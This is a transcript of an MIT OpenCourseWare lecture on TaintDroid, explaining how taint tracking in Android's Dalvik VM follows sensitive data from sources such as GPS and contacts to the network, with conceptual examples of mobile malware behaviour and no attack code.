1 00:00:00,080 --> 00:00:02,430 The following content is provided under a Creative 2 00:00:02,430 --> 00:00:03,810 Commons license. 3 00:00:03,810 --> 00:00:06,050 Your support will help MIT OpenCourseWare 4 00:00:06,050 --> 00:00:10,150 continue to offer high quality educational resources for free. 5 00:00:10,150 --> 00:00:12,690 To make a donation or to view additional materials 6 00:00:12,690 --> 00:00:16,600 from hundreds of MIT courses, visit MIT OpenCourseWare 7 00:00:16,600 --> 00:00:17,310 at ocw.mit.edu. 8 00:00:25,732 --> 00:00:28,210 PROFESSOR: All right, let's get started. 9 00:00:28,210 --> 00:00:29,820 Thank you for showing up to this very 10 00:00:29,820 --> 00:00:32,619 special pre-Thanksgiving lecture. 11 00:00:32,619 --> 00:00:35,570 I'm glad you guys have such devotion to security, 12 00:00:35,570 --> 00:00:37,790 I'm sure that you will be rewarded on the job market 13 00:00:37,790 --> 00:00:38,373 at some point. 14 00:00:38,373 --> 00:00:40,340 Feel free to list me as a recommendation. 15 00:00:40,340 --> 00:00:42,877 So today we're going to talk about taint tracking, 16 00:00:42,877 --> 00:00:45,210 and in particular we're going to look at a system called 17 00:00:45,210 --> 00:00:47,950 TaintDroid that looks at how to do this type of information 18 00:00:47,950 --> 00:00:51,930 flow analysis in the context of Android smartphones. 19 00:00:51,930 --> 00:00:54,970 And so the basic problem the paper deals with 20 00:00:54,970 --> 00:00:57,190 is this fact that apps can exfiltrate data. 21 00:00:57,190 --> 00:00:58,940 So the basic idea is that your phone 22 00:00:58,940 --> 00:01:01,670 contains a lot of sensitive information, right. 23 00:01:01,670 --> 00:01:05,060 It contains your contacts list and your phone number 24 00:01:05,060 --> 00:01:06,920 and your email and all that kind of stuff. 
25 00:01:06,920 --> 00:01:12,070 So if the operating system or the phone itself isn't careful, 26 00:01:12,070 --> 00:01:14,550 then a malicious app might be able to take 27 00:01:14,550 --> 00:01:17,030 some of that information and send it back 28 00:01:17,030 --> 00:01:19,337 to its home server, and that server 29 00:01:19,337 --> 00:01:21,170 can use it for all types of nefarious things 30 00:01:21,170 --> 00:01:23,810 as we'll talk about later. 31 00:01:23,810 --> 00:01:29,900 The high-level solution that the TaintDroid paper suggests 32 00:01:29,900 --> 00:01:35,320 is that we should basically track the sensitive data as it 33 00:01:35,320 --> 00:01:37,940 flows through the system, and essentially, we 34 00:01:37,940 --> 00:01:42,754 need to stop it from going over the network. 35 00:01:42,754 --> 00:01:44,170 In other words, we need to stop it 36 00:01:44,170 --> 00:01:50,380 from being passed as an argument to networking system calls. 37 00:01:54,260 --> 00:01:56,400 And so presumably, if we can do that, 38 00:01:56,400 --> 00:01:59,230 then we can essentially stop the leak right at the moment 39 00:01:59,230 --> 00:02:00,940 that it's about to happen. 40 00:02:00,940 --> 00:02:02,660 So you might think to yourself, so why 41 00:02:02,660 --> 00:02:05,470 are traditional Android permissions 42 00:02:05,470 --> 00:02:09,770 insufficient to stop these types of data exfiltrations? 43 00:02:09,770 --> 00:02:12,660 And the reason is that these permissions don't really 44 00:02:12,660 --> 00:02:15,452 have the appropriate grammar to talk about the type of attack 45 00:02:15,452 --> 00:02:16,660 that we're trying to prevent. 46 00:02:16,660 --> 00:02:18,493 So a lot of times these Android permissions, 47 00:02:18,493 --> 00:02:21,400 they deal with these things like can an application 48 00:02:21,400 --> 00:02:23,550 read or write to a particular device. 
49 00:02:23,550 --> 00:02:24,940 But we're talking about something 50 00:02:24,940 --> 00:02:27,570 at a sort of different level of semantics. 51 00:02:27,570 --> 00:02:30,620 We're saying even if an application has been granted 52 00:02:30,620 --> 00:02:33,330 the authority to read or write a particular device, 53 00:02:33,330 --> 00:02:35,830 like the network, for example, it still 54 00:02:35,830 --> 00:02:40,100 might not be good to allow that application to read or write 55 00:02:40,100 --> 00:02:43,000 certain sensitive data over that device to which it 56 00:02:43,000 --> 00:02:44,890 has permissions. 57 00:02:44,890 --> 00:02:48,060 In other words, using these traditional Android security 58 00:02:48,060 --> 00:02:49,690 policies, it is difficult to speak 59 00:02:49,690 --> 00:02:51,997 about specific types of data. 60 00:02:51,997 --> 00:02:54,580 It's much easier to talk about whether an application accesses 61 00:02:54,580 --> 00:02:55,620 a device or not. 62 00:02:55,620 --> 00:03:00,490 So you might think, all right, so that's kind of a bummer, 63 00:03:00,490 --> 00:03:02,870 but maybe we can solve this problem 64 00:03:02,870 --> 00:03:07,015 by-- we have this alternate solution, so we'll 65 00:03:07,015 --> 00:03:08,600 call this solution star. 66 00:03:08,600 --> 00:03:11,410 So maybe we can just never install 67 00:03:11,410 --> 00:03:21,410 applications that can do reads of sensitive data 68 00:03:21,410 --> 00:03:24,690 and also have network access. 69 00:03:27,660 --> 00:03:29,890 At first glance, that seems to solve the problem. 70 00:03:29,890 --> 00:03:31,430 Because if it can't do both of these things, 71 00:03:31,430 --> 00:03:33,138 it either can't get to the sensitive data 72 00:03:33,138 --> 00:03:35,879 in the first place, or it can, but it can't send it anywhere. 73 00:03:35,879 --> 00:03:38,170 So does anyone have any ideas where this probably isn't 74 00:03:38,170 --> 00:03:39,336 going to work out very well? 
75 00:03:42,252 --> 00:03:43,960 Everyone's already thinking about turkey. 76 00:03:43,960 --> 00:03:46,760 I can see it in your eyes. 77 00:03:46,760 --> 00:03:50,500 The main reason why this is probably a bad idea 78 00:03:50,500 --> 00:03:57,220 is that this is going to break a lot of legitimate applications. 79 00:03:59,950 --> 00:04:02,234 So you could imagine that there are a lot of programs, 80 00:04:02,234 --> 00:04:03,650 like maybe email clients or things 81 00:04:03,650 --> 00:04:07,550 like that, that should actually have the ability, perhaps, 82 00:04:07,550 --> 00:04:09,060 to read some data that's sensitive 83 00:04:09,060 --> 00:04:12,044 and also send information over the network. 84 00:04:12,044 --> 00:04:13,460 So if we just say that we're going 85 00:04:13,460 --> 00:04:15,617 to prevent this sort of "and" type of activity, 86 00:04:15,617 --> 00:04:17,700 then you're actually going to make a lot of things 87 00:04:17,700 --> 00:04:20,019 that work right now fail. 88 00:04:20,019 --> 00:04:22,220 So users are not going to like that. 89 00:04:22,220 --> 00:04:26,580 Another problem here is that even if we did implement 90 00:04:26,580 --> 00:04:32,300 this solution, it's not going to stop a bunch of different side 91 00:04:32,300 --> 00:04:35,890 channel mechanisms for data leakage. 92 00:04:35,890 --> 00:04:37,930 So for example, we've looked in previous classes 93 00:04:37,930 --> 00:04:40,750 at how the browser cache, for example, 94 00:04:40,750 --> 00:04:43,900 can leak information about whether a particular site has 95 00:04:43,900 --> 00:04:45,200 been visited or not. 96 00:04:45,200 --> 00:04:48,200 And so even if we have a security policy like this, 97 00:04:48,200 --> 00:04:50,387 maybe we don't capture all kinds of side channels. 98 00:04:50,387 --> 00:04:52,720 We'll talk about some other side channels a little later 99 00:04:52,720 --> 00:04:54,870 in the lecture.
100 00:04:54,870 --> 00:05:01,250 Another thing that this wouldn't stop is app collusion. 101 00:05:01,250 --> 00:05:05,040 So two apps can actually collaborate 102 00:05:05,040 --> 00:05:07,220 to break the security system. 103 00:05:07,220 --> 00:05:10,400 So for example, what if there's one app that 104 00:05:10,400 --> 00:05:12,060 doesn't have network access, but it 105 00:05:12,060 --> 00:05:14,600 can talk to a second application, which does? 106 00:05:14,600 --> 00:05:16,879 So maybe it can use Android's IPC mechanisms 107 00:05:16,879 --> 00:05:18,920 to pass the sensitive data to an application that 108 00:05:18,920 --> 00:05:21,170 does have network permissions, and that second app can 109 00:05:21,170 --> 00:05:24,780 actually upload that information to the server. 110 00:05:24,780 --> 00:05:27,920 And even if the apps aren't colluding, 111 00:05:27,920 --> 00:05:31,540 there may be some type of trickery 112 00:05:31,540 --> 00:05:34,300 that an application can engage in 113 00:05:34,300 --> 00:05:37,000 to trick some other application into accidentally revealing 114 00:05:37,000 --> 00:05:38,040 sensitive data. 115 00:05:38,040 --> 00:05:40,960 So maybe there's some type of weakness in the way 116 00:05:40,960 --> 00:05:42,510 that the email program is written, 117 00:05:42,510 --> 00:05:45,322 and so perhaps that email program accepts 118 00:05:45,322 --> 00:05:47,280 too many random messages from other things that 119 00:05:47,280 --> 00:05:48,340 are living on the system. 120 00:05:48,340 --> 00:05:50,850 So perhaps we could craft a special intent that's somehow 121 00:05:50,850 --> 00:05:53,360 going to trick your Gmail application, for example, 122 00:05:53,360 --> 00:05:57,409 into emailing something to someone outside of the phone. 123 00:05:57,409 --> 00:05:59,950 At a high level, this approach doesn't really work very well.
124 00:06:02,682 --> 00:06:04,390 One important thing to think about is OK, 125 00:06:04,390 --> 00:06:06,681 so it seems like we're very worried about the sensitive 126 00:06:06,681 --> 00:06:07,710 data leaving the phone. 127 00:06:07,710 --> 00:06:12,690 So what does Android malware actually do in practice? 128 00:06:12,690 --> 00:06:16,364 Are there any kinds of real world attacks 129 00:06:16,364 --> 00:06:18,030 that we're going to be preventing by all 130 00:06:18,030 --> 00:06:19,950 this taint tracking type stuff? 131 00:06:19,950 --> 00:06:21,320 And the answer is yes. 132 00:06:21,320 --> 00:06:24,080 So increasingly, malware is becoming a bigger problem 133 00:06:24,080 --> 00:06:25,080 for these mobile phones. 134 00:06:25,080 --> 00:06:31,020 So one thing it might do is it might use your location 135 00:06:31,020 --> 00:06:37,325 or maybe your IMEI for ads. 136 00:06:40,227 --> 00:06:41,810 So similarly to malware, it's actually 137 00:06:41,810 --> 00:06:44,060 going to look and see where you are physically located 138 00:06:44,060 --> 00:06:46,970 in the world and then maybe it will say, oh, you're 139 00:06:46,970 --> 00:06:48,720 located near the MIT campus, therefore you 140 00:06:48,720 --> 00:06:50,190 must be a hungry student so hey, why don't you 141 00:06:50,190 --> 00:06:52,356 go to my food truck that happens to be located right 142 00:06:52,356 --> 00:06:54,130 where you are. 143 00:06:54,130 --> 00:06:57,282 IMEI is kind of like this-- you can 144 00:06:57,282 --> 00:07:00,410 think of it as an integer that's like a per-device unique identifier. 145 00:07:00,410 --> 00:07:02,924 So this could be used perhaps to track you in ways that you 146 00:07:02,924 --> 00:07:04,965 don't want to be tracked, in different locations, 147 00:07:04,965 --> 00:07:05,757 so on and so forth. 148 00:07:05,757 --> 00:07:07,381 So there's actually malware in the wild 149 00:07:07,381 --> 00:07:08,840 that does things like that.
150 00:07:08,840 --> 00:07:11,080 Another thing that malware might try to do 151 00:07:11,080 --> 00:07:13,040 is steal your credentials. 152 00:07:17,250 --> 00:07:22,850 So for example, it might try to take your phone number, 153 00:07:22,850 --> 00:07:24,880 or it might try to take your contact list, 154 00:07:24,880 --> 00:07:27,680 it might try to upload those things to a remote server. 155 00:07:27,680 --> 00:07:30,690 Maybe that's useful for trying to impersonate you, 156 00:07:30,690 --> 00:07:33,690 for example, in a message that's going 157 00:07:33,690 --> 00:07:35,790 to be used for spam later on. 158 00:07:35,790 --> 00:07:39,990 There's malware out there that does things like this today. 159 00:07:39,990 --> 00:07:44,290 Perhaps most horrifyingly, at least for me, 160 00:07:44,290 --> 00:07:49,891 malware might be able to turn your phone into a bot. 161 00:07:49,891 --> 00:07:52,140 This, of course, is a problem that our parents did not 162 00:07:52,140 --> 00:07:53,120 have to deal with. 163 00:07:53,120 --> 00:07:55,380 Modern phones are so powerful that they can actually 164 00:07:55,380 --> 00:07:57,845 be used to send out spam messages themselves. 165 00:07:57,845 --> 00:08:00,230 So there's actually a pretty nasty piece 166 00:08:00,230 --> 00:08:01,900 of malware that's going around right now 167 00:08:01,900 --> 00:08:03,810 that seems to be targeting some corporate environments that's 168 00:08:03,810 --> 00:08:04,710 doing precisely this. 169 00:08:04,710 --> 00:08:07,168 So it gets to your phone and just starts sending out stuff. 170 00:08:07,168 --> 00:08:09,160 AUDIENCE: So this type of malware, 171 00:08:09,160 --> 00:08:12,397 is it malware that subverts the Android OS, or is it 172 00:08:12,397 --> 00:08:13,642 just a typical app? 173 00:08:13,642 --> 00:08:16,630 If it's a typical app, it seems that it should be able-- 174 00:08:16,630 --> 00:08:18,810 PROFESSOR: Yeah. 175 00:08:18,810 --> 00:08:20,720 That's a good question. 
176 00:08:20,720 --> 00:08:22,720 There's both types of malware out there. 177 00:08:22,720 --> 00:08:24,990 As it turns out, it's actually fairly easy 178 00:08:24,990 --> 00:08:28,620 to get users to click on things. 179 00:08:28,620 --> 00:08:29,790 So I'll give you an example. 180 00:08:29,790 --> 00:08:31,290 This isn't necessarily indicative of malware, 181 00:08:31,290 --> 00:08:32,832 more about the sad state of humanity. 182 00:08:32,832 --> 00:08:34,373 There'll be a popular game out there, 183 00:08:34,373 --> 00:08:35,832 let's say Angry Birds, for example. 184 00:08:35,832 --> 00:08:37,997 You go to the App Store and you type in Angry Birds, 185 00:08:37,997 --> 00:08:39,110 I want to get Angry Birds. 186 00:08:39,110 --> 00:08:40,880 So hopefully the first hit that you get 187 00:08:40,880 --> 00:08:42,530 is the actual Angry Birds. 188 00:08:42,530 --> 00:08:46,160 But then the second hit will be something like Angry Birdss, 189 00:08:46,160 --> 00:08:47,374 with two S's, for example. 190 00:08:47,374 --> 00:08:48,790 And a lot of people will go there, 191 00:08:48,790 --> 00:08:50,789 and maybe it's cheaper than the regular version, 192 00:08:50,789 --> 00:08:51,649 and they go there. 193 00:08:51,649 --> 00:08:53,440 It's going to present that thing that says, 194 00:08:53,440 --> 00:08:55,450 do you allow this application to do this, this, and this. 195 00:08:55,450 --> 00:08:57,275 The person is going to say, yeah, because I got to get my Angry 196 00:08:57,275 --> 00:08:58,190 Birds, yeah, sure. 197 00:08:58,190 --> 00:09:00,280 Boom, then that person could be owned. 198 00:09:00,280 --> 00:09:01,910 So in practice you see malware that 199 00:09:01,910 --> 00:09:03,520 exploits both types of vectors.
200 00:09:03,520 --> 00:09:06,800 But you're exactly right that if you assume that the Android 201 00:09:06,800 --> 00:09:09,950 security model is correct, then the malware sort of 202 00:09:09,950 --> 00:09:13,760 has to depend on users being foolish or naive 203 00:09:13,760 --> 00:09:15,869 and giving it network access, for example, 204 00:09:15,869 --> 00:09:17,660 when your tic-tac-toe game shouldn't really 205 00:09:17,660 --> 00:09:18,530 have network access. 206 00:09:21,814 --> 00:09:23,480 Yes, so you can actually have your phone 207 00:09:23,480 --> 00:09:24,470 get turned into a bot. 208 00:09:24,470 --> 00:09:25,860 This is horrible for multiple reasons, 209 00:09:25,860 --> 00:09:27,360 not only because your phone is a bot 210 00:09:27,360 --> 00:09:28,930 but also because maybe you're paying 211 00:09:28,930 --> 00:09:30,612 for data for all those emails that are 212 00:09:30,612 --> 00:09:31,820 getting sent from your phone. 213 00:09:31,820 --> 00:09:33,640 Maybe your battery's getting ground down 214 00:09:33,640 --> 00:09:36,610 because your phone's just sitting around constantly 215 00:09:36,610 --> 00:09:41,740 sending ads about whatever, free trips to Bermuda or whatever. 216 00:09:41,740 --> 00:09:45,170 There are actually malicious applications out there 217 00:09:45,170 --> 00:09:48,975 that will use your private information for bad purposes. 218 00:09:48,975 --> 00:09:50,850 And the particularly bad thing about this bot 219 00:09:50,850 --> 00:09:52,891 here is that it can actually look at your contact 220 00:09:52,891 --> 00:09:54,380 list and send spam on your behalf 221 00:09:54,380 --> 00:09:57,130 to people that you know and make the likelihood of the victim 222 00:09:57,130 --> 00:09:59,380 clicking on something in that email much, much higher.
223 00:10:01,511 --> 00:10:03,510 One thing to note, and this is kind of getting back 224 00:10:03,510 --> 00:10:04,660 to the discussion we just had, so 225 00:10:04,660 --> 00:10:06,034 preventing this data exfiltration 226 00:10:06,034 --> 00:10:07,240 is very nice, right. 227 00:10:07,240 --> 00:10:09,440 But in and of itself, preventing that exfiltration 228 00:10:09,440 --> 00:10:11,512 doesn't stop the hack in the first place. 229 00:10:11,512 --> 00:10:13,470 So there are mechanisms that we actually 230 00:10:13,470 --> 00:10:15,910 should look at to prevent your machine from getting owned 231 00:10:15,910 --> 00:10:18,249 in the first place or to educate users about what they 232 00:10:18,249 --> 00:10:19,540 should and should not click on. 233 00:10:19,540 --> 00:10:20,914 So just doing this taint tracking 234 00:10:20,914 --> 00:10:23,124 isn't a full solution for preventing your machine 235 00:10:23,124 --> 00:10:24,165 from getting compromised. 236 00:10:26,910 --> 00:10:33,240 How is TaintDroid in particular going to work? 237 00:10:33,240 --> 00:10:35,520 Let's see. 238 00:10:35,520 --> 00:10:38,460 So as I mentioned before, TaintDroid 239 00:10:38,460 --> 00:10:43,760 is going to track all of your sensitive information 240 00:10:43,760 --> 00:10:45,520 as it propagates through the system. 241 00:10:45,520 --> 00:10:48,340 So TaintDroid distinguishes between what 242 00:10:48,340 --> 00:10:51,140 they call information sources and information sinks. 243 00:10:51,140 --> 00:10:58,240 So these sources are things that generate sensitive data. 244 00:10:58,240 --> 00:11:02,520 So you might think of this as things like sensors. 245 00:11:02,520 --> 00:11:05,310 So for example, GPS, accelerometer, 246 00:11:05,310 --> 00:11:06,780 things like that.
247 00:11:06,780 --> 00:11:12,600 This could be your contact list database, 248 00:11:12,600 --> 00:11:20,520 this could be things like the IMEI, basically anything that 249 00:11:20,520 --> 00:11:24,000 might help to tie you, a particular user, 250 00:11:24,000 --> 00:11:25,250 to your actual phone. 251 00:11:25,250 --> 00:11:28,220 So these are the things that generate the taint. 252 00:11:28,220 --> 00:11:31,280 And then you can think of these sinks 253 00:11:31,280 --> 00:11:36,170 as being the places where we don't want tainted data to go. 254 00:11:36,170 --> 00:11:38,150 And so in the case of TaintDroid, 255 00:11:38,150 --> 00:11:41,530 the particular sink that we're concerned about is the network. 256 00:11:44,090 --> 00:11:47,690 As we'll talk about later, you can generalize information flow 257 00:11:47,690 --> 00:11:49,990 to more scenarios than TaintDroid specifically covers. 258 00:11:49,990 --> 00:11:52,281 So you can imagine there might be other sinks in a more 259 00:11:52,281 --> 00:11:53,430 general purpose system. 260 00:11:53,430 --> 00:11:54,971 But for TaintDroid, they're literally 261 00:11:54,971 --> 00:11:59,180 caring about the network as the sink for information. 262 00:11:59,180 --> 00:12:08,550 So in TaintDroid, they're going to use a 32-bit bitvector 263 00:12:08,550 --> 00:12:12,300 to represent taint. 264 00:12:12,300 --> 00:12:15,590 And so what this basically means is that you can have, 265 00:12:15,590 --> 00:12:20,140 at most, 32 distinct taint sources. 266 00:12:20,140 --> 00:12:22,510 So each sensitive data value will 267 00:12:22,510 --> 00:12:24,204 have a one in a particular position 268 00:12:24,204 --> 00:12:26,620 if it has been tainted by some particular source of taint. 269 00:12:26,620 --> 00:12:31,370 That's like, has it been derived from your GPS data, 270 00:12:31,370 --> 00:12:32,140 for example. 
271 00:12:32,140 --> 00:12:34,370 Has it been derived from something from your contacts 272 00:12:34,370 --> 00:12:37,540 list, and so on and so forth. 273 00:12:37,540 --> 00:12:41,680 One interesting thing is that 32 sources of taint 274 00:12:41,680 --> 00:12:44,120 is actually not that big, right. 275 00:12:44,120 --> 00:12:47,960 And so an interesting question is, 276 00:12:47,960 --> 00:12:49,900 is that big enough for this particular system 277 00:12:49,900 --> 00:12:52,108 and is it big enough in general for these information 278 00:12:52,108 --> 00:12:53,430 flow systems. 279 00:12:53,430 --> 00:12:55,860 So in a particular case of TaintDroid, 280 00:12:55,860 --> 00:12:58,160 32 possible sources of taint seems 281 00:12:58,160 --> 00:13:01,160 to be somewhat reasonable, because it's actually 282 00:13:01,160 --> 00:13:04,360 looking at a fairly constrained information flow problem. 283 00:13:04,360 --> 00:13:07,230 So it's saying given all the sensors you have on your phone, 284 00:13:07,230 --> 00:13:09,400 given all of these sensitive databases, 285 00:13:09,400 --> 00:13:12,000 and things like that, 32 seems roughly 286 00:13:12,000 --> 00:13:15,250 the right order of magnitude in terms 287 00:13:15,250 --> 00:13:18,170 of storing these taint flags. 288 00:13:18,170 --> 00:13:21,100 And as we'll see in the implementation of this system, 289 00:13:21,100 --> 00:13:22,600 32 is actually very convenient, too, 290 00:13:22,600 --> 00:13:24,390 because what else is 32 bits? 291 00:13:24,390 --> 00:13:25,590 Well, an integer. 292 00:13:25,590 --> 00:13:28,006 So you can actually do some very efficient representations 293 00:13:28,006 --> 00:13:30,650 of these taint flags in the way that they actually build this. 
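A minimal sketch of the 32-bit taint tag just described, written in Python for brevity. The source names and bit positions below are hypothetical and are not TaintDroid's actual assignments; the point is only that each source owns one bit and a tag is a plain integer.

```python
# Hypothetical illustration: one bit per taint source in a 32-bit tag.
# The names and bit positions are assumptions, not TaintDroid's real layout.

def source_bit(position: int) -> int:
    """Return the tag bit for a source; only positions 0..31 fit in the tag."""
    if not 0 <= position < 32:
        raise ValueError("only 32 distinct taint sources fit in a 32-bit tag")
    return 1 << position

TAINT_CLEAR = 0                 # no bits set: the value is untainted
TAINT_GPS = source_bit(0)       # assumed position for location data
TAINT_CONTACTS = source_bit(1)  # assumed position for the contacts list
TAINT_IMEI = source_bit(2)      # assumed position for the device identifier

def has_taint(tag: int, source: int) -> bool:
    """True if the tag records that the value was derived from this source."""
    return (tag & source) != 0

lat_tag = TAINT_GPS                       # derived only from GPS
message_tag = TAINT_GPS | TAINT_CONTACTS  # derived from GPS and contacts
```

Because the whole tag is one machine word, asking whether a value carries a given taint is a single AND, which is the efficiency the lecture alludes to.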
294 00:13:30,650 --> 00:13:32,150 As we'll discuss a little bit later, 295 00:13:32,150 --> 00:13:36,090 though, if you want to expose information flow to programmers 296 00:13:36,090 --> 00:13:38,310 in a more generic way, so for example, 297 00:13:38,310 --> 00:13:40,440 if you want programmers to be able to specify 298 00:13:40,440 --> 00:13:44,080 their own sources of taint and their own types of sinks, 299 00:13:44,080 --> 00:13:46,660 then 32 bits probably isn't enough. 300 00:13:46,660 --> 00:13:48,060 In systems like that you actually 301 00:13:48,060 --> 00:13:51,790 have to think about including more complex runtime support 302 00:13:51,790 --> 00:13:54,960 for a larger label space. 303 00:13:54,960 --> 00:13:57,720 So does that all make sense? 304 00:13:57,720 --> 00:14:02,830 OK so roughly speaking, when you look at the way 305 00:14:02,830 --> 00:14:06,370 that taint flows through the system, at a high level, 306 00:14:06,370 --> 00:14:09,750 it basically goes from the right hand side of a statement 307 00:14:09,750 --> 00:14:11,160 to the left hand side. 308 00:14:11,160 --> 00:14:16,060 So as a very simple example, if you had some statement, 309 00:14:16,060 --> 00:14:19,180 like you declare an integer variable that's going to get 310 00:14:19,180 --> 00:14:27,520 your latitude, and then at a high level you call gps.getLat(), 311 00:14:27,520 --> 00:14:31,770 then essentially this thing here is going to generate a value 312 00:14:31,770 --> 00:14:33,972 that has some taint that's associated with it. 313 00:14:33,972 --> 00:14:35,930 Some particular flag will be set that indicates 314 00:14:35,930 --> 00:14:38,400 that hey, this value I'm returning 315 00:14:38,400 --> 00:14:39,650 comes from a sensitive source. 316 00:14:39,650 --> 00:14:41,941 So the taint will come from here on the right hand side 317 00:14:41,941 --> 00:14:43,600 and go over here to the left hand side, 318 00:14:43,600 --> 00:14:45,840 and now that variable is actually tainted.
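The right-to-left flow on an assignment can be sketched as follows. This is an illustration only: `Tagged`, `gps_get_lat`, and the `TAINT_GPS` bit are hypothetical stand-ins for the `gps.getLat()` call on the board, and the latitude value is made up.

```python
# Hypothetical illustration of taint flowing from the right-hand side of an
# assignment to the left-hand side. None of these names come from TaintDroid.
from dataclasses import dataclass

TAINT_GPS = 1 << 0  # assumed bit position for the GPS source

@dataclass(frozen=True)
class Tagged:
    """A value paired with the taint tag that travels alongside it."""
    value: int
    taint: int = 0

def gps_get_lat() -> Tagged:
    """Stand-in for a sensor API: the returned value is born tainted."""
    return Tagged(value=42, taint=TAINT_GPS)  # 42 is a made-up latitude

# The taint on the right-hand side arrives with the value on the left.
lat = gps_get_lat()
```

After the assignment, `lat.taint` has the GPS bit set even though the program never mentioned taint explicitly; the tracking rides along with the value.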
319 00:14:45,840 --> 00:14:49,210 So that's sort of what it looks like from the perspective 320 00:14:49,210 --> 00:14:52,080 of the human developer who writes source code. 321 00:14:52,080 --> 00:14:56,284 However, the Dalvik VM actually uses this register-based format 322 00:14:56,284 --> 00:14:58,200 at the lower level to actually build programs, 323 00:14:58,200 --> 00:15:00,770 and that's actually the way that these taint semantics 324 00:15:00,770 --> 00:15:03,864 are implemented in reality. 325 00:15:03,864 --> 00:15:06,030 This is what's explained in Table 1 of the paper, 326 00:15:06,030 --> 00:15:09,345 so they have this big list of classes of opcodes, 327 00:15:09,345 --> 00:15:11,720 and they describe how taint sort of flows 328 00:15:11,720 --> 00:15:12,880 for those types of opcodes. 329 00:15:12,880 --> 00:15:14,950 So for example, you might imagine 330 00:15:14,950 --> 00:15:20,060 that you have an operation that looks kind of like a move, 331 00:15:20,060 --> 00:15:24,990 and so it mentions a destination and a source. 332 00:15:24,990 --> 00:15:28,334 So Dalvik is a register-based virtual machine, 333 00:15:28,334 --> 00:15:29,750 so you can think of these as being 334 00:15:29,750 --> 00:15:33,450 registers on this sort of abstract computation engine. 335 00:15:33,450 --> 00:15:36,990 And so essentially what happens here is that, like I said, 336 00:15:36,990 --> 00:15:39,557 taint goes from the right hand side to the left hand side. 337 00:15:39,557 --> 00:15:41,390 So in this case, when the Dalvik interpreter 338 00:15:41,390 --> 00:15:43,190 executes this instruction here, it's 339 00:15:43,190 --> 00:15:45,830 going to look at the taint label of the source, 340 00:15:45,830 --> 00:15:48,050 and it's going to assign it to the destination. 341 00:15:50,714 --> 00:15:53,130 Then you might imagine you have another instruction that's 342 00:15:53,130 --> 00:15:55,110 like a binary operation.
343 00:15:55,110 --> 00:15:59,300 So think of this as something like addition, for example. 344 00:15:59,300 --> 00:16:01,480 So here you'll have a single destination, 345 00:16:01,480 --> 00:16:07,350 but then you'll have two sources. 346 00:16:07,350 --> 00:16:09,000 And what will happen in this case 347 00:16:09,000 --> 00:16:12,120 is that when the Dalvik interpreter encounters this instruction, 348 00:16:12,120 --> 00:16:14,040 it'll take the taints of both of the sources, 349 00:16:14,040 --> 00:16:18,960 construct a union of those, and then assign that union 350 00:16:18,960 --> 00:16:22,049 to be the taint tag of the destination. 351 00:16:22,049 --> 00:16:23,090 Does that all make sense? 352 00:16:23,090 --> 00:16:24,470 It's fairly straightforward. 353 00:16:24,470 --> 00:16:28,250 So the table breaks down all the different types of instructions 354 00:16:28,250 --> 00:16:30,952 that you'll see, but to a first approximation, 355 00:16:30,952 --> 00:16:32,660 these are the most common ways that taint 356 00:16:32,660 --> 00:16:34,500 propagates through the system. 357 00:16:34,500 --> 00:16:37,350 Now there are actually some interesting special cases 358 00:16:37,350 --> 00:16:39,240 that they mention in the paper. 359 00:16:39,240 --> 00:16:46,680 So one of those special cases involves arrays. 360 00:16:46,680 --> 00:16:49,130 Let's say that you have some code that's 361 00:16:49,130 --> 00:16:53,470 going to declare a character c, and you 362 00:16:53,470 --> 00:16:56,480 get the value for the character somehow, doesn't really matter. 363 00:16:56,480 --> 00:17:02,380 And then let's say the program declares some array, 364 00:17:02,380 --> 00:17:04,609 we'll call it upper. 365 00:17:04,609 --> 00:17:15,020 And it's basically going to have uppercase versions of letters.
366 00:17:15,020 --> 00:17:16,980 And so one very common thing to do in code 367 00:17:16,980 --> 00:17:20,690 is to index into an array like this using, for example, maybe 368 00:17:20,690 --> 00:17:22,580 just c directly, because as we all know, 369 00:17:22,580 --> 00:17:25,079 Kernighan and Ritchie teach us that basically characters are 370 00:17:25,079 --> 00:17:26,710 integers, so hooray for that. 371 00:17:26,710 --> 00:17:29,670 So you can imagine that you have some code that 372 00:17:29,670 --> 00:17:33,960 says something like the upper case version of this character 373 00:17:33,960 --> 00:17:38,080 here is going to be whatever is at a particular index 374 00:17:38,080 --> 00:17:43,400 in this table here, and you index that table by c, like this. 375 00:17:43,400 --> 00:17:48,780 So there's a question of what taint should this receive? 376 00:17:48,780 --> 00:17:50,280 It seems pretty straightforward what 377 00:17:50,280 --> 00:17:52,930 should happen in these cases, but in this case, 378 00:17:52,930 --> 00:17:55,352 it seems like we have multiple things that are going on. 379 00:17:55,352 --> 00:17:57,810 We've got this array here that may have some type of taint, 380 00:17:57,810 --> 00:17:59,476 we've got this character c here that may 381 00:17:59,476 --> 00:18:01,500 have some type of taint. 382 00:18:01,500 --> 00:18:04,350 What Dalvik decides to do in this case 383 00:18:04,350 --> 00:18:05,835 is a little bit similar to what it 384 00:18:05,835 --> 00:18:08,000 does in the case of this binary op here. 385 00:18:08,000 --> 00:18:11,450 So it's essentially going to say that this character over here 386 00:18:11,450 --> 00:18:15,500 is going to get the union of the taint of c and also 387 00:18:15,500 --> 00:18:16,800 of the array.
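The array lookup rule can be sketched like this. It is a simplified model, assuming a hypothetical `TaintedArray` wrapper and a made-up `TAINT_CONTACTS` bit; the real system applies the rule inside the interpreter rather than in a helper function.

```python
# Hypothetical illustration of the array-lookup rule: the result carries the
# union of the index's taint and the array's taint. Names are assumptions.
from dataclasses import dataclass

TAINT_CONTACTS = 1 << 1  # assumed bit position for contacts-derived data

@dataclass
class TaintedArray:
    items: list
    taint: int = 0  # a single tag for the whole array

def array_get(arr: TaintedArray, index: int, index_taint: int):
    """Return (value, taint) where taint = taint(index) | taint(array)."""
    return arr.items[index], arr.taint | index_taint

# A lookup table of uppercase letters, itself untainted.
upper = TaintedArray(items=[chr(i).upper() for i in range(128)], taint=0)

# A character c that was derived from sensitive data.
c, c_taint = "q", TAINT_CONTACTS

# Indexing by c: the table is clean, but the result still reveals c.
upper_c, upper_c_taint = array_get(upper, ord(c), c_taint)
```

Even though the table holds no sensitive data, `upper_c` inherits the taint of `c`, because knowing the result tells you which index was used.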
